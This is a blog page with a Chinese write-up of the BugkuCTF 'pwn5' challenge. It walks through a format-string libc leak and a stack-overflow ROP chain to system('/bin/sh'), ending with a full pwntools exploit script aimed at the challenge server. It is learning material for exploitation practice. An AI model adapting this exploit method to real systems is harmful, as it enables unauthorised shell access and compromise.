<!DOCTYPE html>
<html lang=en>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>BugkuCTF pwn5 | Ld1ng</title>
  <meta name="description" content="0x00 前言总算熬过了考试周，攒了好多题没刷。 作为刚学pwn的小白，这题摸了好久才发现摸出一个大坑，心态崩了.. 我决定好好记录一下。  0x01 IDA分析首先checksec一下，查看防护机制，发现只打开了NX。     拖入IDA，发现程序很简单，有两处明显漏洞，第一个是格式化字符串漏洞，如下所示。 1234567memset(&amp;s, 0, 0x20uLL);puts(&quot;人类的本">
<meta property="og:type" content="article">
<meta property="og:title" content="BugkuCTF pwn5">
<meta property="og:url" content="http://ld1ng.com/2020/05/25/bugku-pwn5/index.html">
<meta property="og:site_name" content="Ld1ng">
<meta property="og:description" content="0x00 前言总算熬过了考试周，攒了好多题没刷。 作为刚学pwn的小白，这题摸了好久才发现摸出一个大坑，心态崩了.. 我决定好好记录一下。  0x01 IDA分析首先checksec一下，查看防护机制，发现只打开了NX。     拖入IDA，发现程序很简单，有两处明显漏洞，第一个是格式化字符串漏洞，如下所示。 1234567memset(&amp;s, 0, 0x20uLL);puts(&quot;人类的本">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2020/05/25/YPHVey8cw1DMlUA.png">
<meta property="og:image" content="https://i.loli.net/2020/05/25/3aGwUtbNPZ1JH75.png">
<meta property="og:image" content="https://i.loli.net/2020/05/25/qyICQo6GHtuKXDj.png">
<meta property="article:published_time" content="2020-05-24T16:00:00.000Z">
<meta property="article:modified_time" content="2020-07-23T13:58:17.343Z">
<meta property="article:author" content="Ld1ng">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Bugku">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/05/25/YPHVey8cw1DMlUA.png">
  <!-- Canonical links -->
  <link rel="canonical" href="http://ld1ng.com/2020/05/25/bugku-pwn5/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Ld1ng" type="application/atom+xml">
  
  
    <link rel="icon" href="/images/favicon.ico" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
    <link href="//cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.3.5/dist/jquery.fancybox.min.css" rel="stylesheet">
  
  
<meta name="generator" content="Hexo 4.2.0"></head>


<body class="main-center" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/ld1ng" target="_blank">
          <img class="img-circle img-rotate" src="/images/liding.png" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">Ld1ng</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md"></h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> JiangSu , China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="Search" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="Type something..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav menu-highlight">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">Home</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">Archives</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">Categories</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">Tags</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-repository">
          <a href="/repository">
            
            <i class="icon icon-project"></i>
            
            <span class="menu-title">Repository</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-books">
          <a href="/books">
            
            <i class="icon icon-book-fill"></i>
            
            <span class="menu-title">Books</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">Links</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">About</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/ld1ng" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="https://weibo.com/5580147545/profile?" target="_blank" title="Weibo" data-toggle=tooltip data-placement=top><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="https://twitter.com/Liding10763325" target="_blank" title="Twitter" data-toggle=tooltip data-placement=top><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">Board</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>When people lose their thinking power, the human age will end</p>
            </div>
        </div>
    </div>
</div>

    
      
  <div class="widget">
    <h3 class="widget-title">Categories</h3>
    <div class="widget-body">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/DEVELOP/">DEVELOP</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/LEARNING/">LEARNING</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/LIFE/">LIFE</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/PWN/">PWN</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/REVERSE/">REVERSE</a><span class="category-list-count">4</span></li></ul>
    </div>
  </div>


    
      
    <script type="text/javascript" charset="utf-8" src="/js/tagcloud.js"></script>
    <script type="text/javascript" charset="utf-8" src="/js/tagcanvas.js"></script>
    <div class="widget-wrap">
        <h3 class="widget-title">Tag Cloud</h3>
        <div id="myCanvasContainer" class="widget tagcloud">
            <canvas width="200" height="200" id="resCanvas" style="width=100%">
                <a href="/tags/ADWorld/" style="font-size: 15px;">ADWorld</a> <a href="/tags/Assembly/" style="font-size: 10px;">Assembly</a> <a href="/tags/Bugku/" style="font-size: 10px;">Bugku</a> <a href="/tags/CTF/" style="font-size: 20px;">CTF</a> <a href="/tags/KNOWLEDGE/" style="font-size: 15px;">KNOWLEDGE</a> <a href="/tags/OpenCV/" style="font-size: 10px;">OpenCV</a> <a href="/tags/PERSONALITY/" style="font-size: 10px;">PERSONALITY</a>
            </canvas>
        </div>
    </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Archive</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">August 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/07/">July 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/06/">June 2020</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a><span class="archive-list-count">4</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Tags</h3>
    <div class="widget-body">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/ADWorld/" rel="tag">ADWorld</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Assembly/" rel="tag">Assembly</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Bugku/" rel="tag">Bugku</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a><span class="tag-list-count">6</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/KNOWLEDGE/" rel="tag">KNOWLEDGE</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/OpenCV/" rel="tag">OpenCV</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PERSONALITY/" rel="tag">PERSONALITY</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled ">
        
          <li>
            
            <div class="item-thumb">
              <a href="/2020/08/05/WMCTF/" class="thumb">
    
    
        <span class="thumb-image thumb-none"></span>
    
</a>

            </div>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/REVERSE/">REVERSE</a>
              </p>
              <p class="item-title">
                <a href="/2020/08/05/WMCTF/" class="title">WMCTF2020</a>
              </p>
              <p class="item-date">
                <time datetime="2020-08-04T16:00:00.000Z" itemprop="datePublished">2020-08-05</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-thumb">
              <a href="/2020/07/24/ADWorld-pwn/" class="thumb">
    
    
        <span class="thumb-image thumb-none"></span>
    
</a>

            </div>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/PWN/">PWN</a>
              </p>
              <p class="item-title">
                <a href="/2020/07/24/ADWorld-pwn/" class="title">ADWorld_PWN  (updating..)</a>
              </p>
              <p class="item-date">
                <time datetime="2020-07-23T16:00:00.000Z" itemprop="datePublished">2020-07-24</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-thumb">
              <a href="/2020/07/23/Heap/" class="thumb">
    
    
        <span class="thumb-image thumb-none"></span>
    
</a>

            </div>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/LEARNING/">LEARNING</a>
              </p>
              <p class="item-title">
                <a href="/2020/07/23/Heap/" class="title">堆溢出漏洞利用总结</a>
              </p>
              <p class="item-date">
                <time datetime="2020-07-22T16:00:00.000Z" itemprop="datePublished">2020-07-23</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-thumb">
              <a href="/2020/07/01/canary/" class="thumb">
    
    
        <span class="thumb-image thumb-none"></span>
    
</a>

            </div>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/LEARNING/">LEARNING</a>
              </p>
              <p class="item-title">
                <a href="/2020/07/01/canary/" class="title">学习canary&amp;&amp;栈迁移</a>
              </p>
              <p class="item-date">
                <time datetime="2020-06-30T16:00:00.000Z" itemprop="datePublished">2020-07-01</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-thumb">
              <a href="/2020/06/20/Graduation/" class="thumb">
    
    
        <span class="thumb-image thumb-none"></span>
    
</a>

            </div>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/LIFE/">LIFE</a>
              </p>
              <p class="item-title">
                <a href="/2020/06/20/Graduation/" class="title">观毕业季有感</a>
              </p>
              <p class="item-date">
                <time datetime="2020-06-19T16:00:00.000Z" itemprop="datePublished">2020-06-20</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<aside class="sidebar sidebar-toc collapse" id="collapseToc" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    <nav id="toc" class="article-toc">
      <h3 class="toc-title">Catalogue</h3>
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00-前言"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-IDA分析"><span class="toc-number">1.1.</span> <span class="toc-text">0x01 IDA分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-程序分析"><span class="toc-number">1.2.</span> <span class="toc-text">0x02 程序分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-漏洞利用"><span class="toc-number">1.3.</span> <span class="toc-text">0x03 漏洞利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-exp"><span class="toc-number">1.4.</span> <span class="toc-text">0x04 exp</span></a></li></ol></li></ol>
    </nav>
  </div>
</aside>

<main class="main" role="main">
  <div class="content">
  <article id="post-bugku-pwn5" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      BugkuCTF pwn5
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2020/05/25/bugku-pwn5/" class="article-date">
	  <time datetime="2020-05-24T16:00:00.000Z" itemprop="datePublished">2020-05-25</time>
	</a>
</span>
        
  <span class="article-category">
    <i class="icon icon-folder"></i>
    <a class="article-category-link" href="/categories/PWN/">PWN</a>
  </span>

        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link" href="/tags/Bugku/" rel="tag">Bugku</a>, <a class="article-tag-link" href="/tags/CTF/" rel="tag">CTF</a>
  </span>


        
	<span class="article-read hidden-xs">
	    <i class="icon icon-eye-fill" aria-hidden="true"></i>
	    <span id="busuanzi_container_page_pv">
			<span id="busuanzi_value_page_pv">0</span>
		</span>
	</span>


        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2020/05/25/bugku-pwn5/#comments" class="article-comment-link">Comments</a></span>
        
	
		<span class="post-wordcount hidden-xs" itemprop="wordCount">Word Count: 1.4k(words)</span>
	
	
		<span class="post-readcount hidden-xs" itemprop="timeRequired">Read Count: 5(minutes)</span>
	

      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <h1 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h1><p>总算熬过了考试周，攒了好多题没刷。</p>
<p>作为刚学pwn的小白，这题摸了好久才发现摸出一个大坑，心态崩了..</p>
<p>我决定好好记录一下。</p>
<hr>
<h2 id="0x01-IDA分析"><a href="#0x01-IDA分析" class="headerlink" title="0x01 IDA分析"></a>0x01 IDA分析</h2><p>首先checksec一下，查看防护机制，发现只打开了NX。</p>
<img src="https://i.loli.net/2020/05/25/YPHVey8cw1DMlUA.png" alt="image-20200525200910618" style="zoom:85%;" />



<p>拖入IDA，发现程序很简单，有两处明显漏洞，第一个是<strong>格式化字符串漏洞</strong>，如下所示。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">memset</span>(&amp;s, <span class="number">0</span>, <span class="number">0x20</span>uLL);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">"人类的本质是什么?\n"</span>);</span><br><span class="line"><span class="built_in">read</span>(<span class="number">0</span>, &amp;s, <span class="number">8u</span>LL);</span><br><span class="line"><span class="built_in">printf</span>(&amp;s, &amp;s);</span><br><span class="line"><span class="built_in">puts</span>(&amp;s);</span><br><span class="line"><span class="built_in">puts</span>(&amp;s);</span><br><span class="line"><span class="built_in">puts</span>(&amp;s);</span><br></pre></td></tr></table></figure>

<p>关于格式化字符串漏洞可以参考这篇文章：<a href="https://www.cnblogs.com/elvirangel/p/7191512.html" target="_blank" rel="noopener">格式化字符串讲解</a></p>
<p>还有这篇很不错的<a href="https://veritas501.space/2017/04/28/格式化字符串漏洞学习/" target="_blank" rel="noopener">经典讲解</a>，讲的特别好，可以好好学习一下。</p>
<p>正常情况下format-&gt;hello,world%s%d%f</p>
<p>​                   -&gt;a(%s) 第一个参数</p>
<p>​                   -&gt;b(%d)第二个参数</p>
<p>​                   -&gt;c(%f)第三个参数</p>
<hr>
<p>第二处漏洞是<strong>栈溢出</strong>，在第二次输入的时候，read函数会读入0x40长度的数据，但s只有0x20的长度，造成溢出。但是，想要溢出还要有一个条件，就是不要跳转到if分支中。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">read</span>(<span class="number">0</span>, &amp;s, <span class="number">0x40</span>uLL);</span><br><span class="line"><span class="keyword">if</span> ( !<span class="built_in">strstr</span>(&amp;s, <span class="string">"鸽子"</span>) || !<span class="built_in">strstr</span>(&amp;s, <span class="string">"真香"</span>) )</span><br><span class="line">&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"你并没有理解人类的本质,再见!"</span>);</span><br><span class="line">  <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">"人类的三大本质:复读机,真香,鸽子"</span>);</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br></pre></td></tr></table></figure>



<h2 id="0x02-程序分析"><a href="#0x02-程序分析" class="headerlink" title="0x02 程序分析"></a>0x02 程序分析</h2><p>首先，不同于一开始的入门题，这个程序不存在后门（<code>system</code>和<code>bin/sh</code>），所以需要返回到libc中，那么就需要泄露libc的基地址。</p>
<blockquote>
<p><strong>知识点：</strong>由于延迟绑定机制，只有动态库函数在被调用时，才会地址解析和重定位工作，所以如果想找到libc的基地址的话，必须要通过已经被调用的函数的地址来计算。也就是说如果知道某被调用过的函数的真实地址，再减去偏移地址，即可知道libc基地址，那么libc中任意函数的地址只要加上偏移地址就可以计算出。</p>
</blockquote>
<p>那么思路很清晰了，只要通过格式化字符串漏洞泄露出一个确定的函数地址，便可求出libc基地址</p>
<p>，那么就可以找到<code>system</code>和<code>bin/sh</code>的位置，通过栈溢出就可以get shell了。</p>
<hr>
<h2 id="0x03-漏洞利用"><a href="#0x03-漏洞利用" class="headerlink" title="0x03 漏洞利用"></a>0x03 漏洞利用</h2><p>要利用格式化字符串漏洞首先要找到要泄露地址的函数的位置，这里用到gdb动调，emmm有点复杂，这里不做过多讲解，结果如下图所示。</p>
<p><img src="https://i.loli.net/2020/05/25/3aGwUtbNPZ1JH75.png" alt="image-20200525210034344"></p>
<p>很显然可以计算出<code>__libc_start_main+231</code>在栈中的位置：0x28/8+6=11</p>
<p>即这是格式化字符串的第11个参数，因此泄露地址的payload就是<code>%11$p</code>。</p>
<p>这里需要注意的是接收的格式要转换为16位int，再减去偏移的231，之后才能作为<code>__libc_start_main</code>的起始地址传给<code>LibcSearcher</code>，确定libc版本，找到<code>system</code>和<code>/bin/sh</code>地址。</p>
<blockquote>
<p><strong>知识点：</strong>1.%num$p是指泄露出第num个参数的偏移的地址</p>
<p>​               2.64位程序函数前六个参数分别放在寄存器rdi，rsi，rdx，rcx，r8，r9，从第7个参数起开始加载到栈。（也就是偏移量+6的原因）</p>
</blockquote>
<hr>
<p>接下来就要确定libc的版本，可以使用这个<a href="https://libc.blukat.me/?q=__libc_start_main_ret%3A830&l=libc6_2.23-0ubuntu10_amd64" target="_blank" rel="noopener">在线网站</a>进行查询。</p>
<p>也可以使用<code>LibcSearcher</code>工具（程序需要放在该文件夹下）</p>
<p>通过libc就可以查到system和bin/sh的偏移地址了</p>
<p>最后一步，利用栈溢出漏洞，通过strstr函数的<a href="https://www.runoob.com/cprogramming/c-function-strstr.html" target="_blank" rel="noopener">使用方式</a>可得，字符串中必须同时含有“鸽子”和“真香”才不会跳转进去。利用cyclic，可以发现报错的返回地址是0x6161616961616168，即“真香鸽子”后再有28位填充数据（cyclic -l查看后4个字节）。由于是64位，所以/bin/sh地址需要传给rdi。</p>
<p>用ROPgadget搜索，发现程序中存在pop rdi; ret的地址，因此可以确定payload了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary human --only &#39;pop|ret&#39;</span><br><span class="line">Gadgets information</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;</span><br><span class="line">0x000000000040092c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x000000000040092e : pop r13 ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x0000000000400930 : pop r14 ; pop r15 ; ret</span><br><span class="line">0x0000000000400932 : pop r15 ; ret</span><br><span class="line">0x000000000040092b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x000000000040092f : pop rbp ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x0000000000400700 : pop rbp ; ret</span><br><span class="line">0x0000000000400933 : pop rdi ; ret</span><br><span class="line">0x0000000000400931 : pop rsi ; pop r15 ; ret</span><br><span class="line">0x000000000040092d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret</span><br><span class="line">0x00000000004005e9 : ret</span><br></pre></td></tr></table></figure>

<h2 id="0x04-exp"><a href="#0x04-exp" class="headerlink" title="0x04 exp"></a>0x04 exp</h2><p>通过上面一顿分析，终于可以写exp了</p>
<p>但是…</p>
<p><img src="https://i.loli.net/2020/05/25/qyICQo6GHtuKXDj.png" alt="image-20200525213926059"></p>
<p>(╯‵□′)╯︵┻━┻！！！！！！！！！！！！！！！！！！！！！</p>
<p>大坑出现了。。在网上找了好久，终于发现目标机器的libc是2.23，而我的ubuntu18.4的libc是2.27，调试的时候用的是我的机器编译链接，函数偏移自然不一样。做pwn还是建议使用Ubuntu16.4，老版本才是王道。</p>
<p>最后贴出正确的exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#sh = process('./human')</span></span><br><span class="line">sh = remote(<span class="string">'114.116.54.89'</span>,<span class="number">10005</span>)</span><br><span class="line"><span class="comment">#context.log_level = 'debug'</span></span><br><span class="line"></span><br><span class="line">sh.recvuntil(<span class="string">'?'</span>)</span><br><span class="line">payload = <span class="string">'%11$p'</span><span class="comment">#栈中第十一个参数</span></span><br><span class="line"><span class="keyword">print</span> payload</span><br><span class="line"></span><br><span class="line">sh.sendline(payload)</span><br><span class="line">leak_addr = int(sh.recvuntil(<span class="string">"%11$p"</span>)[:<span class="number">-6</span>], <span class="number">16</span>)<span class="comment">#接受数据，直到“%11＄p”，并去掉后6个字节</span></span><br><span class="line">libc_start_addr = leak_addr - <span class="number">240</span></span><br><span class="line"></span><br><span class="line">libc = LibcSearcher(<span class="string">"__libc_start_main"</span>, libc_start_addr)</span><br><span class="line">libc_base = libc_start_addr - libc.dump(<span class="string">'__libc_start_main'</span>)</span><br><span class="line">system_addr = libc_base + libc.dump(<span class="string">'system'</span>)</span><br><span class="line">binsh_addr = libc_base + libc.dump(<span class="string">'str_bin_sh'</span>)</span><br><span class="line"><span class="keyword">print</span> hex(libc_base)</span><br><span class="line"></span><br><span class="line">pop_rdi_ret = <span class="number">0x0000000000400933</span></span><br><span class="line"></span><br><span class="line">sh.recvuntil(<span class="string">'?'</span>)</span><br><span class="line">pass_str = <span class="string">"真香鸽子"</span></span><br><span class="line">pass_str = pass_str.ljust(<span class="number">0x20</span>,<span class="string">'a'</span>)+<span class="string">'a'</span>*<span class="number">8</span>+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)<span class="comment">#栈溢出</span></span><br><span class="line">sh.sendline(pass_str)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>果然，</p>
<p>一入pwn门深似海，从此脱发是常态！</p>
<p>呜呼悲哉！</p>

      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="http://ld1ng.com/2020/05/25/bugku-pwn5/" title="BugkuCTF pwn5">http://ld1ng.com/2020/05/25/bugku-pwn5/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/ld1ng" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/liding.png" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/ld1ng" target="_blank"><span class="text-dark">Ld1ng</span><small class="ml-1x"></small></a></h3>
        <div>Primary school students majoring in information security.</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    <li class="prev">
      <a href="/2020/06/03/ADWorld-RE/" title="ADWorld_RE  (updating..)"><i class="icon icon-angle-left" aria-hidden="true"></i><span>&nbsp;&nbsp;Newer</span></a>
    </li>
    
    
    <li class="next">
      <a href="/2020/05/11/IDA%E5%8A%A8%E8%B0%83/" title="CUMT CTF Mind reading"><span>Older&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
    <li class="toggle-toc">
      <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false" title="Catalogue" role="button">
        <span>[&nbsp;</span><span>Catalogue</span>
        <i class="text-collapsed icon icon-anchor"></i>
        <i class="text-in icon icon-close"></i>
        <span>]</span>
      </a>
    </li>
    
  </ul>
  
  
  <!-- Button trigger modal -->
  <button type="button" class="btn btn-fancy btn-donate pop-onhover bg-gradient-warning" data-toggle="modal" data-target="#donateModal"><span>$</span></button>
  <!-- <div class="wave-icon wave-icon-danger btn-donate" data-toggle="modal" data-target="#donateModal">
    <div class="wave-circle"><span class="icon"><i class="icon icon-bill"></i></span></div>
  </div> -->
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  
<!-- Modal -->
<div class="modal modal-center modal-small modal-xs-full fade" id="donateModal" tabindex="-1" role="dialog">
